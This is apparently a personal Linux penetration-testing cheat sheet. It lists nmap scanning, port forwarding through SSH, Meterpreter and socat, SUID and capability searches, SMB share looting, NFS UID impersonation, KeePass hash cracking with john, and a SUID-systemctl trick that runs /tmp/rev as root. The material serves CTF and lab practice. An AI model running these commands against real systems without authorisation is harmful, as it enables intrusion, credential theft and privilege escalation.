InfoSec enthusiast | pwn | RE | CTF | BugBounty

Linux Cheat-Sheet

What’s here ?

  • Some essential enum things. :smile:

Enum scripts/bins:


host discovery:

nmap -sP

Port scanning:

normal scan:

nmap -sC -sV -p- "target ip" -o output.txt    

Connect scan (Useful with proxychains):

proxychains nmap -sT -p- "target ip" -o output.txt  

Note, the full port “-p-“ its so damn slow, same as udp.
UDP scan:

nmap -sU "target ip" -o output.txt  

Port forwarding:

Local port forwarding:

ssh -L 5555:remote_address:remote_port user@remote_ip

Meterpreter version:

portfwd add -l "localport" -p "remoteport" -r "target host"

Remote port forwarding:

ssh -R 5555:local_address:local_port user@remote_ip

Dynamic forwarding:

ssh -D "localport" user@remote_ip

Socat version:

socat tcp-listen:8080,reuseaddr,fork tcp:"target ip":9001

Binaries with special Capabilities:

find / -type f -print0 2>/dev/null  |  xargs -0 getcap   2>/dev/null


/sbin/getcap -r / 2>/dev/null

fast smtp server:

sudo python -m smtpd -n -c DebuggingServer

SUID Binaries:

find / -perm -u=s 2>/dev/null

Sudo check:

sudo -l

Check ifopen files:

fuser "filename"

NFS Shares:

If you mount an NFS share, you can abuse the sared files, impersonating the UID, of the owner on the remote box.

mount -t nfs user@remoteip:/path /mount/point

SMB things:

List samba shares:

smbclient -L \\\\ip
smbmap -H ip -u user -p password

Connect to a share:

smbclient \\\\ip\\share_name -U "user"%"password"

Download everything, rolf:

  smb: \> recurse on
  smb: \> prompt off
  smb: \> mget *

Mount a remote smbshare:

mount -t cifs '//remote_ip/share' /mount/point

Create a Simple SBMServer:

smbserver.py -smb2support sharename $PWD

KeePass files

If you find a keepass database (.kdbx), it can be encrypted with a master key or with a file as one, To crack it:

keepass2john -k MASTER.file file.kdbx  >> hash.txt
john --wordlist=wordlist hash.txt

kpcli --kdb file.kdbx --key MASTER.file 

systemctl as suid bin:*

Create a custom service definition:

echo '[Service]
ExecStart=/bin/bash /tmp/rev
WantedBy=multi-user.target' > /tmp/.fade/fserv3.service
systemctl link /tmp/.fade/fserv3.service
systemctl start fserv3

The /tmp/rev will be executed as root at startup :) !

updated_at 04-05-2020